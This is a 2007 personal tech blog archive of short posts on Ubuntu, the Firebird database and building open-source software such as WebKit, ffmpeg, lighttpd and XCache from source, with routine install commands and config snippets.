Tuesday, December 18, 2007

yutube error

500 Internal Server Error


Sorry, something went wrong.

A team of highly trained monkeys has been dispatched to deal with this situation. Please report this incident to customer service.


Also, please include the following information in your error report:


jEuv2cKXadfLnM1-eCcgOlMEt0G0HykFgG1uP-wayYVA6XoLlis_YauYP8KD


kde4.0 on hardy

# Remove previous KDE 4 packages, they are not compatible (sudo apt-get remove kdelibs5 kde4base-data kde4libs-data)
# Add deb http://ppa.launchpad.net/kubuntu-members-kde4/ubuntu hardy main to your /etc/apt/sources.list
# Install the updated kdebase-bin
sudo apt-get install kdebase-bin
# Install kdebase-workspace kdebase-kde4 kdebase-runtime,
sudo apt-get install kdebase-workspace kdebase-kde4 kdebase-runtime
note that PPAs aren't authenticated so you will likely get a warning when installing



enjoy the now kde desktop by selecting the kde4 session at login
Kubuntu - The KDE Desktop

Blogged with Flock

Test Your Software and Perl 5.10-tobe - on ubuntu

[installing perl on my hardy box
wget http://search.cpan.org/CPAN/authors/id/R/RG/RGARCIA/perl-5.10.0-RC2.tar.gz
tar -zxvf perl-5.10.0-RC2.tar.gz
cd perl-5.10.0-RC2
sh Configure -Dprefix=/opt/perl5.10
make
make test
sudo make install

you can read how to test perl modules on new perl in the article bellow
 ]

Perl 5.10 will be out soon — within a week — and pumpking Rafael Garcia-Suarez will likely release a final release candidate for final testing and polishing.
Test Your Software and Perl 5.10-tobe - O'Reilly ONLamp Blog

Blogged with Flock

Sunday, December 16, 2007

to make my printer (hp4000) work on gutsy i had to boot an old ubuntu live cd 6.10 and test it there (add new printer )

with the folowing config Manufacturer Hp, Model 4000, Driver hpijs , Connection Part Port #1 (Epson)
the last line seems to be very important

Then i deleted my /etc/cups from gutsy and copied all the /etc/cups directory from 6.10

I will see later what is the difference between the two configs

Thursday, December 13, 2007

Sencer.de: Welcome Claws Mail, Goodbye Thunderbird [updated]

[I kinda start to hate the thunderbird for it's slowness , also i use no extension so for me the jump is easy if i pump my emaisl to the claws mail , I used it before and it rocked , it was very very faast
and did i mention that you get rid of 2G limitation for the inbox folder from the thunderbird ? you can put emails in MailDir format with each mail in it's own folder - this is the best way no more inbox corruption ]

What made me switch was the responsiveness of Claws, and the reliability (from what I can tell with my little experience). And both of those points have actually been my major peeves with Thunderbird (which is sort of funny, because I remember similar motivations when migrating from an out-dated outlook to thunderbird in the first place a few years ago)
Sencer.de: Welcome Claws Mail, Goodbye Thunderbird [updated]

Blogged with Flock

Wednesday, December 12, 2007

Richard Stallman - and AI book

I was reading some AI book and i was shocked to find an reference to RMS , yes that RMS . So he was an great Lisp hacker before it went the GNU way :P


Stallman, Richard M; Sussman, Gerald J (November 1975). Heuristic Techniques in Computer-Aided Circuit Analysis. IEEE Transactions on Circuits and Systems.
Richard Stallman - Wikipedia, the free encyclopedia

Blogged with Flock

Tuesday, December 11, 2007



turboc_ubuntu.png (PNG Image, 726x428 pixels)

Blogged with Flock

compile hello world in turbo c

how to enjoy turbo c in ubuntu :P
1. start dosemu
$dosemu
2. start tc
C:\>cd  tc
tc
F3 and load HELLO.C and run

CTRL-F9

Mariuz's Blog

Blogged with Flock

Install dosemu first
sudo apt-get install dosemu

Click on the Turbo C 2.01 zip file to download the software (note: download size is 1.1 mb). When you are finished downloading the software, use your favorite zip utility

Extract all files with unzip


cd mariuz@borkstation32:~/.dosemu/drive_c$
unzip -d ~/archives/tc201.zip
cd Disk2
mv * ../Disk1/
cd ../Disk3
mv * ../Disk1/

start dosemu
$dosemu

cd disk1
C:\Disk1>install.exe

enjoy turbo c in ubuntu :P


Antique Software: Turbo C version 2.01

Blogged with Flock

Monday, December 10, 2007

Finally: an easy guide to Compiz on Xubuntu 7.10!

Time to enable compiz on my hardy :P With Xubuntu 7.10, installing Compiz no longer pulls along half of Gnome. However, there still was a lack of guides on the internet describing how to install Compiz on Xubuntu, so I've written one.After all, why shouldn't Xubuntu users be allowed to enjoy the bling? Have fun :)

read more | digg story

Saturday, December 08, 2007

Firebird 2.0.3 included in Ubuntu 8.04 (Hardy)

The new Alpha version of ubuntu named Hardy Heron includes firebird 2.0.3 stableHere is the package description , Here is how to install

read more | digg story

Thursday, December 06, 2007



:*.☆。  Some random spam for xmass  。☆.*: 
 
・'゜☆。.・'゜☆。.・'゜☆。.・'゜☆。.・'゜☆。.・'゜☆。.・'
         ☆                     ☆   
   。   ☆ /\ 。  _п        。   ☆  /\ 
 。  。 /\/ \   /  \ 。  。 。 。 /\/ \  
  。   / \  \。 |□□|  ○。  。   / \  \ 
    。  ̄‖ ̄ ‖  ̄  |□□| ( )。   。  ̄‖ ̄ ‖

Monday, December 03, 2007

while searching for linutop on google

they say i have spyware on ubuntu ....doh

http://www.google.ro/sorry/?continue=http://www.google.ro/search%3Fhl%3Den%26q%3Dlinutop%26btnG%3DGoogle%2BSearch%26meta%3D


Saturday, December 01, 2007

Firebird is Sourceforge Project of the Month

December is Firebird’s turn to be Project of the Month at Sourceforge

read more | digg story

Wednesday, November 28, 2007

Alternate way to compile AMR Codec Libraries for GNU-Linux into ffmpeg

This is a home page or amrnb and amrwb libraries, based on the reference implementation. I created it to prevent ugly embedding of the same code to many Open Source projects and to maintain patches and fixes for it.

Alternate way to compile amrcode libraries
is to download the scripts from bellow and then add the copile flags for ffmpeg from svn (or you can install it all in /usr and add no extra flags)
--enable-libamr-nb --extra-cflags=-I/opt/libamrnb/include --extra-ldflags=-L/opt/libamrnb/lib

http://ubuntuforums.org/showthread.php?t=178455


I will modify my compile scripts and see how it works
cat ffmpeg_checkout.sh
svn checkout svn://svn.mplayerhq.hu/ffmpeg/trunk ffmpeg
cat ffmpeg/configure.sh
./configure --prefix=/usr --enable-libamr-nb --enable-libamr-wb --enable-libogg --enable-libvorbis --enable-libgsm --enable-libxvid --enable-liba52 --enable-libmp3lame --enable-libx264 --enable-libtheora --enable-libfaad --enable-gpl --enable-shared --enable-pthreads --enable-swscaler
 cat mplayer_checkout.sh
svn checkout svn://svn.mplayerhq.hu/mplayer/trunk mplayer

mplayer is configured with --prefix=/usr

also don't forget to install the full code pack
http://www3.mplayerhq.hu/MPlayer/releases/codecs/all-20071007.tar.bz2
into /usr/lib/codecs

mkdir /usr/lib/codecs/
wget http://www3.mplayerhq.hu/MPlayer/releases/codecs/all-20071007.tar.bz2
tar -jxvf all-20071007.tar.bz2
cd all-20071007
mv * /usr/lib/codecs/

cd mplayer
./configure --prefix=/usr
make install
AMR Codec Libraries for GNU-Linux

Blogged with Flock

Friday, November 23, 2007

lazarus 0.9.24 released

The Lazarus team is glad to announce the 0.9.24 release. This release is based on fpc 2.2.0.This release can be downloaded from thesourceforge download page.

read more | digg story

Wednesday, November 21, 2007

Using Git for Samba Development - vs OOPS i deleted the svn server

In the future (at reea maybe)
we can use  an true distributed VCS like GIT/Bazaar/Mercurial

http://en.wikipedia.org/wiki/Git_%28software%29
http://bazaar-vcs.org/
http://www.selenic.com/mercurial/wiki/

http://ianclatworthy.files.wordpress.com/2007/10/dvcs-why-and-how3.pdf

Many projects like samba and mozilla are switching from svn to something better and distributed (no SPOF)
http://wiki.samba.org/index.php/Using_Git_for_Samba_Development


ps: SPOF = single point of failure or OOps i deleted the SVN server


Using Git for Samba Development - SambaWiki

Blogged with Flock

lighttpd 1.4.18 - speeding up a bit

# compile and upgrade lighttpd to latest stable version

wget http://www.lighttpd.net/download/lighttpd-1.4.18.tar.gz
tar -zxvf lighttpd-1.4.18.tar.gz
cd lighttpd-1.4.18
./configure --prefix=/opt/lighttpd
make; make install
/etc/init.d/lighttpd restart


lighttpd 1.4.18 - speeding up a bit

Blogged with Flock

2nd Russian Firebird and Interbase Conference, Moscow, November 23

The second Russian Firebird and Interbase conference will take place in Moscow, November 23. It’s the largest developer event for our Russian-speaking community -

read more | digg story

Tailrank Architecture - Learn How to Track Memes Across the Entire Blogosphere | High Scalability

We use MySQL with InnoDB. We're mostly happy with it though it seems I end upspending about 20% of my time fixing MySQL bugs and limitations.Of course nothing is perfect. MySQL for example was really designed to be usedon single core systems.
Tailrank Architecture - Learn How to Track Memes Across the Entire Blogosphere | High Scalability

Blogged with Flock

Tuesday, November 20, 2007

Firebird V2.03 Classic for Solaris 10 Intel, and Sparc released

Firebird V2.03 Classic for Solaris 10 Intel, and Sparc are available for download. Thanks to Paul Beach and Alex Peshkov.

read more | digg story

AMD Phenom Spider Released (just not to us linuxhardware.org)

So today AMD announced the new SPIDER platform. This new platform consists of an AMD Phenom quad-core processor, AMD 7-series chipset (790FX for enthusiasts), and an ATI Radeon HD 3800 Series video card.

read more | digg story

firebird optimizer paper in czech

firebird optimizer paper don’t know if it will be translated in English it is on the Pavel Cizar's Firebird report from November 3

read more | digg story

how to use DDEX provider for Firebird in VS2008

I've decided to try to install into VS2008 the DDEX provider. It has been working like a charm. I've been doing steps like in any other installation

read more | digg story

Monday, November 19, 2007

Google's secret home-brew 10 gigE switch

Has Google has built its own 10 Gigabit Ethernet switch - one far cheaper and power-efficient than existing switches - as it seeks to widen its infrastructure cost advantage over Yahoo, MSN and AOL? Andrew Schmitt, an analyst at Nyquist Capital makes the case.

read more | digg story

Git on Windows

msysGit is the project to bring one of the most powerful Source Code Management systems to the poor souls stuck with Windows finally gotten the installer working

read more | digg story

Saturday, November 17, 2007

Flash RAM instead of harddisks

Check the comments and you will find a very known “bird” and how you can improove the db speed on flash drives :)

read more | digg story

How to influence Firebird's roadmap

Maybe a few people know (or use it), but anyone can actually influence in what new features should appear in the next FB version, or what bug should get priority in fixing, etc.

read more | digg story

Friday, November 16, 2007

Intel Core 2 "Penryn" and Linux

Intel recently released the new "Penryn" Core 2 processor. So what are these features and how will they equate into benefits to Linux users? That's what Linux Hardware is here to unravel. In this review I'll cover all the high points of the new “Penryn” core and talk to a couple Linux projects about the impact on end-user performance.

read more | digg story

Thursday, November 15, 2007

XCache - Boost PHP Performance - Installing from source

http://xcache.lighttpd.net/wiki/Release-1.2.1#Downloads
lynx http://xcache.lighttpd.net/pub/Releases/1.2.1/xcache-1.2.1.tar.gz
tar -zxvf xcache-1.2.1.tar.gz
cd xcache-1.2.1
/opt/php/bin/phpize
chmod +x configure
./configure --with-php-config=/opt/php/bin/php-config
make install

add to php.ini
extension=xcache.so

[xcache.admin]
xcache.admin.auth = On
xcache.admin.user = "admin"
; xcache.admin.pass = md5($your_password)
xcache.admin.pass = "21212f297a57a5a743894a0e4a801fc3"

[xcache]
; ini only settings, all the values here is default unless explained

; select low level shm/allocator scheme implemenation
xcache.shm_scheme =        "mmap"
; to disable: xcache.size=0
; to enable : xcache.size=64M etc (any size > 0) and your system mmap allows
xcache.size  =                128M
; set to cpu count (cat /proc/cpuinfo |grep -c processor)
xcache.count =                 2
; just a hash hints, you can always store count(items) > slots
xcache.slots =                8K
; ttl of the cache item, 0=forever
xcache.ttl   =                 0
; interval of gc scanning expired items, 0=no scan, other values is in seconds
xcache.gc_interval =           0

; same as aboves but for variable cache
xcache.var_size  =            0M
xcache.var_count =             1
xcache.var_slots =            8K
; default ttl
xcache.var_ttl   =             0
xcache.var_maxttl   =          0
xcache.var_gc_interval =     300

xcache.test =                Off
; N/A for /dev/zero
xcache.readonly_protection = Off
; for *nix, xcache.mmap_path is a file path, not directory.
; Use something like "/tmp/xcache" if you want to turn on ReadonlyProtection
; 2 group of php won't share the same /tmp/xcache
; for win32, xcache.mmap_path=anonymous map name, not file path
xcache.mmap_path =    "/dev/zero"


; leave it blank(disabled) or "/tmp/phpcore/"
; make sure it's writable by php (without checking open_basedir)
xcache.coredump_directory =   ""

; per request settings
xcache.cacher =               On
xcache.stat   =               On
xcache.optimizer =           Off

[xcache.coverager]
; per request settings
; enable coverage data collecting for xcache.coveragedump_directory and xcache_coverager_start/stop/get/clean() functions (will hurt executing performance)
xcache.coverager =          Off

; ini only settings
; make sure it's readable (care open_basedir) by coverage viewer script
; requires xcache.coverager=On
xcache.coveragedump_directory = ""

move admin to the /var/www
mv admin /var/www



Release-1.2.1 - XCache - Boost PHP Performance - Trac

Blogged with Flock

Do you protect your Firebird/Oracle databases?

You can protect your Firebird server by blocking (Firewall) internet access to port 3050 in your database server. Changing the Firebird port to other than the default one may also help to difficult attacks.

read more | digg story

New version of FireRuby

A new version of FireRuby (Firebird’s Ruby driver) was relased yesterday.

read more | digg story

Wednesday, November 14, 2007

Warp speed file serving with pNFS

pNFS splits the NFS file server into two types of servers: the metadata and control server; and as many storage servers as you can afford. Together the control server and the storage servers form a single logical NFS server with a slew of network connections. The compute server, which is likely to be a Beowulf cluster, also has plent

read more | digg story

Secure PHP installation on unix/linux systems

With the growing concerns regarding comment SPAM, XSS attacks, security breaches, etc, we should spend some time learning how to defend ourselves against such threats.etc. So, let's focus on securing our PHP server, thus barring most of the attacks from the start.

read more | digg story

Tuesday, November 13, 2007

Firebird events in Czech Republic

This November there were 2 Firebird events in Czech Republic: Firebird Developers Day and Firebird and Fast Report seminar. It seems Firebird community is growing quickly in Czech Republic, and more and more professionals choose the universal open source database for their solutions.Read more about Czech Events:

read more | digg story

Friday, November 09, 2007

HOW TO Contribute to the Firebird Reference Documentation Sub-Project

The Firebird Reference Documentation Sub-Project has the goal to create a comprehensiveReference Documentation for the Firebird SQL Database.

read more | digg story

Wednesday, November 07, 2007

$60 board runs gOS (Linux, Google Apps)

For $60, developers and Linux hackers can now buy the guts of the recently unveiled $200 Everex TC2502 Linux PC. The compact, ultra-efficient, x86-compatible "gOS Dev Board" comes with "gOS," a lightweight Linux-based OS meant for use with Google Apps.

read more | digg story

Jim Starkey on Relational Databases

Jim Starkey, Senior Software Architect at MySQL, is featured in an online interview over at Dr Dobb's Journal. It's a short interview, but every question reveals insight into the Jim's thoughts on the relational model, SQL, security, standards and more.

read more | digg story

Tuesday, November 06, 2007

Linux Tiny presentation at ELCE 2007

Here are the slides for the presentation at the Embedded LinuxConference Europe 2007

read more | digg story

Tunnelling music from Ubuntu to iTunes via SSH

Share your library via daap from an Ubuntu server at home, to anywhere else in the world using Firefly and iTunes. Nice useful and cheap solution.

read more | digg story

Mandriva live with Firebird 2.0.3

Philippe Makowski made a new Mandriva Live CD with Firebird and some docsInside is Mandriva One 2008.0, Firebird 2.0.3 Classic, Flamerobin.it is fast to download and install, and also safe to try with a live mode

read more | digg story

Monday, November 05, 2007

eLiberatica 2008 opportunities & business by using Open + Free Technologies

We are pleased to announce you that we have started to organize the eLiberatica 2008 conference.The first edition of one of the most important IT events in Romania gathered this year, in May, more than 200 participants in Brasov. Some of the most important representatives of the international Free/Libre/Open Source Software (FLOSS) movement

read more | digg story

Firebird seminar in Prague, Czech Repuplic

Free seminar will take place in Prague, November 9. It’s the second seminar in the autumn series of Firebird and Fast Reports seminars.Seminar will be devoted to Firebird news and features, IBSurgeon tools for Firebird and Fast Report business intelligence products.

read more | digg story

Ubuntu Girl - Spread the Linux with victorious weapons!

This picture will be much more successful than any other right-minded strivings ;-)

read more | digg story

Sunday, November 04, 2007

The Jonney Machine [or Why Windows was Rejected for Linux]

Asustek decided that the Windows operating system was out of the question. The licensing costs would have been the most expensive part of the computer. So it decided to use Linux and build its own user interface, and that became the most time-consuming part of the project.

read more | digg story

Asynchronous database event notifications

Wouldn’t it be nice if your database could tell you that something it thinks you should know about just happened? For example that a record was inserted, modified or deleted from your favorite table. Well, some databases actually can and as of Qt 4.4 you may be able to take advantage of this in your Qt applications.

read more | digg story

Friday, November 02, 2007

MDB2 2.5.0a1 and MDB2_Driver_ibase 1.5.0a1 released

A new alpha release of the PEAR::MDB2 abstraction layer and of the Firebird/Interbase driver has been released.

read more | digg story

working with firebird from shell script (bash or D.O.S)

In this article is described how to run sql scripts from the shell (bash or D.O.S)

read more | digg story

firebird backend for django - progress

firebird database backend wrapper for django seems to be fixed

read more | digg story

mojoPortal Wins Best Other Open Source Content Management System

mojoPortal has won “Best Other Open Source Content Management System” in the 2007 Open Source CMS Awards

read more | digg story

KDE Firebird RBDMS Administration Tool (Updated to work on FirebirdSS-2.1)

Kfb, a free multiple function GUI Database Administration Tool, has been updated to work on FirebirdSS-2.1Beta2.

read more | digg story

iTunes-like Media Player For Ubuntu Gutsy Gibbon: Installing Songbird 0.3

This guide shows how to install the Songbird media player on an Ubuntu 7.10 desktop. Songbird is a free software audio player with media database capabilities written using XUL and VLC, with an interface similar to Apple's iTunes. Songbird is committed to playing the music you want, from the sites you want, on the devices you want.

read more | digg story

Firebird 2.0.3 included in Ubuntu 7.10 (gutsy)

The new ubuntu 7.10 includes firebird 2.0.3 stable

read more | digg story

Thursday, November 01, 2007

building midori - Webkit browser

i assume webit is installed on /usr already
wget wget http://software.twotoasts.de/media/midori/midori-0.0.10.tar.gz
tar -zxvf midori-0.0.10.tar.gz
cd midori-0.0.10
sudo apt-get install libsexy-dev

./configure --prefix=/opt/midori
make
make install

ps: the back and forward buttons don't work yet but in the rest is quite fast and memory
resident is about 40M compared to 300M for firefox ...

midori - Web browser - toastware: Open Source software for GTK+ 2 on Linux and Unix

Blogged with Flock

Wednesday, October 31, 2007

Happy Halloween!


Happy Halloween!
Originally uploaded by Wabana
Happy MS Halloween!

Songbird 0.3 Is Launched!

Big news! Today Songbird shows some wing, shows some leg and leaps media players into the next era of innovation.0.3.x is extremely stable vs previous version , this build rocks , i left it a few days to play in the background andthe music didn't stoppedMy wish list is to add an youtube playlist extension , also to download play flv files (with unplug)

read more | digg story

Tuesday, October 30, 2007

WebKitGtk - building on ubuntu gutsy

svn checkout http://svn.webkit.org/repository/webkit/trunk WebKit


sudo apt-get install gperf libqt4-dev qt4-dev-tools libicu36-dev libcurl4-openssl-dev  libxslt1-dev
export PREFIX=/usr
cd WebKit; ./WebKitTools/Scripts/build-webkit \
--qmakearg=WEBKIT_INC_DIR=$PREFIX/include/WebKit \
--qmakearg=WEBKIT_LIB_DIR=$PREFIX/lib --gtk

./WebKitTools/Scripts/run-launcher --gtk





WebKitGtk - GNOME Live!

Blogged with Flock

Monday, October 29, 2007

Six iTunes alternatives for Linux

"Apple’s iPod has created a worldwide army of fans who sync their life with their music via a Windows PC or Mac computer. But what if you’re one of the growing numbers of users who are ready to ditch Windows Vista and dive head-first into the cup that is Linux?"

read more | digg story

Friday, October 26, 2007

flamerobin 0.8.1 in gentoo portage already

Here you can see the package details and full changelog

read more | digg story

Firebird 2.1 Beta 2 is available in gentoo portage system

Here you can see the package details and full changelog

read more | digg story

Debian GNU/Minix - Yuks

Finally someone has seen the light and started a project that I called for in a previous article. This melding of the Minix kernel with the GNU userland is called Preventa, and seems to poke fun at the name Nexenta, a similar project using the Solaris kernel

read more | digg story

Five great Perl programming techniques to make your life fun again

Imagine writing a program with a tenth the code you currently use, ending up with ten times the features, getting fewer bugs, improving performance, and lowering maintenance costs. And imagine taking the tedious, repetitive work out, leaving you more time for inspiration and insight.

read more | digg story

Mark Guzdial's Amazon Blog: What is the role of language in learning programming? (Part 2 of "What makes programming so hard?") Permalink

Most computing teachers who have worked over these 20 years will tell you that C++ and Java are clearly harder for students to use than Pascal. Measuring that additional complexity is a significant challenge (see earlier blog posting on the challenge of assessing learning about programming). Part of the problem is syntactic. C++ and Java require more typing and have more syntactic rules than earlier intro languages (Pascal, and also Logo or even Basic). There's another level of complexity, though -- the model of computation that a language requires the programmer to use.
Mark Guzdial's Amazon Blog: What is the role of language in learning programming? (Part 2 of "What makes programming so hard?") Permalink

Blogged with Flock

Useful Cacti Templates to Monitor Your Servers :: Homo-Adminus Blog by Alexey Kovyrin

I saw there are are many other forks for the
apache template …
I will check them too

Useful Cacti Templates to Monitor Your Servers :: Homo-Adminus Blog by Alexey Kovyrin

Blogged with Flock

How Hard Could It Be?: Five Easy Ways to Fail

A huge number of technology projects go wrong. This is news to no one. Whether you run a software company with a number of ongoing development efforts or you have a nontech company that hires consultants here and there to provide systems integration, chances are you've bumped up against this problem. Delays, blown budgets, and outright failures are so common in the software world, in fact, that it's hardly newsworthy when a project is years late and millions over budget.
How Hard Could It Be?: Five Easy Ways to Fail, Managing Technology Article - Inc. Article

Blogged with Flock

Wednesday, October 24, 2007

Songbird 0.3 RC2 released!

We're proud to announce Songbird 0.3 RC2. Thanks to your help, we've fixed many issues discovered in our first release candidate.Download Songbird 0.3 RC2 and let us know what you think via our trusted Bugzilla.

read more | digg story

nmap qoute of the day

man nmap
scroll 2 pages ~

-oS <logfilename>
              thIs  l0gz  th3  r3suLtS of YouR ScanZ iN a s|<ipT kiDd|3 f0rM iNto THe fiL3 U sPecfy 4s an arGuMEnT!  U kAn gIv3 the 4rgument "-" (wItHOUt
              qUOteZ) to sh00t output iNT0 stDouT!@!!


Insecure.Org - Nmap Free Security Scanner, Tools & Hacking resources

Blogged with Flock

Tuesday, October 23, 2007

QUOTE of the day :technology used by etp for providing best hosting in romania

No, we don't have Windows. Even our workstations are running Linux.
technology used by etp for providing best hosting in romania

Blogged with Flock

Monday, October 22, 2007

Why I've moved from Vista to Ubuntu 7.10

"Have we reached the beginning of the tipping point? I think we may just have."

read more | digg story

Hot release: kiwilinux 7.10

Kiwi is an Ubuntu derivative tailored for Romanian and Hungarian users. Kiwi is a modified Ubuntu live CD for the i386 architecture. It includes Romanian and Hungarian localization, multimedia codecs, encrypted DVD support, Flash and Java plugins for Firefox, PPPoE GUI for accessing local internet services (Clicknet and RDS).The latest release...

read more | digg story

Pimp Your Gutsy-Gibbon to completely out-do Vista and EQUAL OSX!

Yeah you know what I'm talking about. Give Gutsy A slick dock, dashboard, cover flow, and of course the mighty Compiz Cube!!!

read more | digg story

Friday, October 19, 2007

SQLAlchemy 0.4.0 Released

Michael Bayer writes: I’m very happy to announce that we’ve put out 0.4.0 final. Thanks to all the contributors as well as all the beta testers who have helped us move through six beta releases, just to make sure we’ve got everything right (or as much right as we can)

read more | digg story

FlameRobin 0.8.1 released

We’ve rolled out a new release as promised, mostly bugfixes, please download it and try it. We have binary packages for Windows, Linux, Mac OSX, and sources, of course

read more | digg story

Some pictures from FBConf

Here are some pictures from the first day of the Firebird International Conference in Hamburg - Germany.

read more | digg story

Thursday, October 18, 2007

Bonnie++ tips

if you want html or simple csv text output run bonie++ this way
bonnie++ -s 32104 -u firebird  |  bon_csv2txt > bonie_test.txt
bonnie++ -s 32104 -u firebird  |  bon_csv2html > bonie_test.html

Bonnie++ now at 1.03a (very stable)!

Blogged with Flock

Wednesday, October 17, 2007

howto install firebird odbc driver for unixodbc (from source )

Here is an small guide on installing firebird odbc driver from source (alternate you can install it from binary repository )

read more | digg story

building firebird 2.1.x classic from source on ubuntu

this guide is for ubuntu (feisty/gutsy) and it was tested on an ec2 xen image

read more | digg story

Firebird 3.0 is with 7-10% faster than firebird 2.1.x

The most important of what was done during last months is certainly start of FB3 project. This is B3_0_transition tree. We try to keep it stable at the same time making big code cleanup, including MT stability. This tree is going to become a base for FB3. For today the main result that after cleanup it's stable on linux, at the same time showing 7-

read more | digg story

compiling firebird 2.1.x on amazon ec2 machine (fedora core 6 x64)

This was done on one xen virtual machine hosted at amazon (called EC2) but this guide can be used for any fedora core 6 machine

read more | digg story

Firebird 2.0.3 RPMs for Fedora 8

Arkady Shejn have updated his repository for upcoming Fedora 8 release.

read more | digg story

Tuesday, October 16, 2007

[Phoronix] New Unreal Tournament 3 Linux Details

On a positive note though, the editor for Unreal Tournament 3 (UnrealEd) now uses wxWidgets on all platforms, which helps in making it cross-platform for Linux. UnrealEd for UT3 will be made available for Linux at some point in the future.
[Phoronix] New Unreal Tournament 3 Linux Details

Blogged with Flock

OpenDisc project officially launched!

great cd , there is any wish list ? :) i wish that firebird+flamerobin were included OpenDisc is a collection of high quality open source software for Microsoft Windows users, regularly updated and freely distributable as a CD. It both saves users money and promotes Linux uptake. I started the project after eighteen months spent as Project Lead for Canonical's TheOpenCD, where I found numerous problems holding back development.

read more | digg story

Monday, October 15, 2007

Microsoft :Your Potential . Our Poison (patent crap)

Saw this ad in the latest issue of Information Week. Only Microsoft could possibly see a big panel of buttons and think “this must be what our customers want”. I just had to send it in to you guys.

Microsoft System Center Ad - (37signals)

technorati tags:, , , ,

Blogged with Flock

Ubuntu Weekly Newsletter #61

Ubuntu Community Marketing Team is proud to release the 61st issue of its Community Weekly Newsletter. In this issue we cover the release candidate of Ubuntu 7.10, learning more about Ubuntu at Ubuntu Open Week, Gutsy release parties, another Ubuntu Forums interview, new MOTU team member Laurent Bigonville, and, as always, much much more!

read more | digg story

Friday, October 12, 2007

you can find the time for an contry with google

Switzerland — Current local time: 3:04 PM on Friday, October 12According to http://www.google.com
also you can try with ny time too :)

swiss time - Google Search

technorati tags:, , , ,

Blogged with Flock

facebook is dead ?

[maybe the fad is over, and people are saturated about facebook spam ]

I just got the spread sheet and there seems to be a 9.3% decline in their unique visitors from 33.75 million in August 2007 to 30.6 million in September 2007…Why would that happen to both Facebook ahead of back-to-school season? It just doesn?t make any sense! Unless of course, the unthinkable is happening.

Facebook Traffic Declines - Abandon Ship or Deja Vu?

technorati tags:, , , , ,

Blogged with Flock

FlameRobin 0.8.0 released

Focus of this release is the new Editable Grid feature and many bugfixes.Source and binary packages for Windows (setup.exe and .zip) and Linux (gtk1 and gtk2 for Slackware) are available for download. Also, packages for MacOSX, Debian/Ubuntu, Mandriva, Gentoo and FreeBSD are either done, or on their way soon.

read more | digg story

Sunday, October 07, 2007

Ubuntu Weekly Newsletter #60

Ubuntu Community Marketing Team is proud to release the 60th issue of its Community Weekly Newsletter. In this issue we cover the freeze of the Gutsy archive, a Gutsy countdown script for websites, Philipp Kern joining the MOTU Team, the release of UbuntuBolivia by the Bolivian LoCo Team, Ubuntu Forums interviews, and, much much more!

read more | digg story

Monday, October 01, 2007

Firebird v.2.0.3 is Released

The Firebird Project team is pleased to announce the release of Firebird v.2.0.3. Kits for Windows and Linux (x86 and x64) This sub-release introduces a number of bugfixes done since the 2.0.1 release in March and a couple of important fixes to the withdrawn 2.0.2. It does not add any new functionality to the database engine.

read more | digg story

Wednesday, September 19, 2007

Mandriva Live CD with Firebird

A Mandriva Live CD with Firebird has been compiled by Our Man in Mandriva, Philippe Makowski. Current version has Mandriva 2007.1, Firebird 2.0.1 Classic, Flamerobin, Ibwebadmin and kinterbasdb. More info and download links at the Firebird 2.0.1 Downloads page

read more | digg story

And the Winner is ---

For those who are curious to see the trophies Firebird won in the recent Sourceforge.net Community Choice awards, there's a photo to view. The gizmos make horrible noises. The engraved marble plinths weigh 2 Kgs each...

read more | digg story

Wednesday, September 12, 2007

Super-Easy Ubuntu Setup From Windows - For Windows Users Eager To Try Linux

Wubi is an Ubuntu installer for Windows that lets you install and uninstall Ubuntu from a Windows desktop. Ubuntu is installed within a file in the Windows file system, this file is seen by Ubuntu as a real hard disk. That way the hard drive does not have to be repartitioned before the Ubuntu installation.[This will make ubuntu easier to install on windows machines and on users who don't want to risk partitioning the disks ]

read more | digg story

flamerobin/firebird livecd+bootable usb key with mandriva

Philippe Makowski made a Mandriva Live CD with FirebirdInside is Mandriva 2007.1, Firebird 2.0.1 Classic, Flamerobin, Ibwebadmin,kinterbasdb

read more | digg story

flamerobin/firebird livecd with ubuntu feisty fawn

you can download the final live cd from this page and you can read the guide on how it was created

read more | digg story

OOXML: nice little standard?

Got to see this to believe it. Yes, it's authentic!

read more | digg story

Convert YouTube Videos To Simulated Stereo MP3s

This article provides a Linux Bash command-line version and a GUI version for converting a Google YouTube video to a simulated stereo MP3. (YouTube stores their videos in mono sound.) The GUI version was written in XUL, Javascript, and Bash.

read more | digg story

Friday, September 07, 2007

Steve Jobs' iPhone open letter: What he says and what he *means*

In response to the furore from avid, but out of pocket Apple fans, Jobs was compelled to write an open letter to the masses... So we read between the lines.

read more | digg story

Wednesday, September 05, 2007

OOXML, the past. ODF, the future.

[although Romania voted yes with some kind of bribe involved we all can say now goodbye ooxml and thank for all the poison]There have been many lessons learned in the last few months. Let’s use that knowledge to improve how we make standards. Let’s innovate. Let’s write some great new code. Let’s give our users a superb choice of applications that can all share the same information, no matter who writes the software.

read more | digg story

Monday, September 03, 2007

Ubuntu Weekly Newsletter #55

Ubuntu Community Marketing Team is proud to release the 55th issue of its Community Weekly Newsletter. In this issue we cover: Introducing Hardy Heron 8.04, Full Circle Magazine - Issue #4, Month Of Screen Casts 2007, Kubuntu was represented at the FrOSCon 2007, Ubuntu HQ: Community powered News, Gutsy Release Parties, and much more.

read more | digg story

Thursday, August 23, 2007

another one

Sorry, you are ineligible to sign up for Facebook.

Facebook | Sign Up for Facebook

technorati tags:,

Blogged with Flock

the most fsked up registration form

i put there year 1910
You must enter your real birthday to register.

Facebook | Sign Up for Facebook

technorati tags:, , ,

Blogged with Flock

they forgot poland

Poland voted against closed and propietary standards
Poland against OOXML?

technorati tags:, , ,

Blogged with Flock

another way to hate flash/adobe

yet another upgrade to an propietary extension , (h.264) they give you a little full screen but they keep the servers closed and small details and now the crashes will
be fully accelerated



# I am not in a position able to explain to you why we will not allow 3rd party streaming servers to stream H.264 video or AAC audio into the Flash Player. What I can tell you is that we do not allow this without proper licensing. Refer to Adobe's friendly Flash Media Server sales staff for more information.

kaourantin.net: What just happened to video on the web?

technorati tags:, , , , , , , ,

Blogged with Flock

Wednesday, August 22, 2007

old ubuntu breezy repository changed it's name

So just change the lines e.g. "archive.ubuntu.com ..." to "old-releases.ubuntu.com ..." in your /etc/apt/sources.list or using the GUI in Synaptic/Adept.

Seems like old Ubuntu repositories are gone [Archive] - Phoronix Forums

Blogged with Flock

old ubuntu breezy repository changed it's name

So just change the lines e.g. "archive.ubuntu.com ..." to "old-releases.ubuntu.com ..." in your /etc/apt/sources.list or using the GUI in Synaptic/Adept.

Seems like old Ubuntu repositories are gone [Archive] - Phoronix Forums

Blogged with Flock

Friday, August 17, 2007

extracting mp3s from youtube's videos

install the unplug plugin for firefox

install mencoder
$sudo apt-get install mencoder

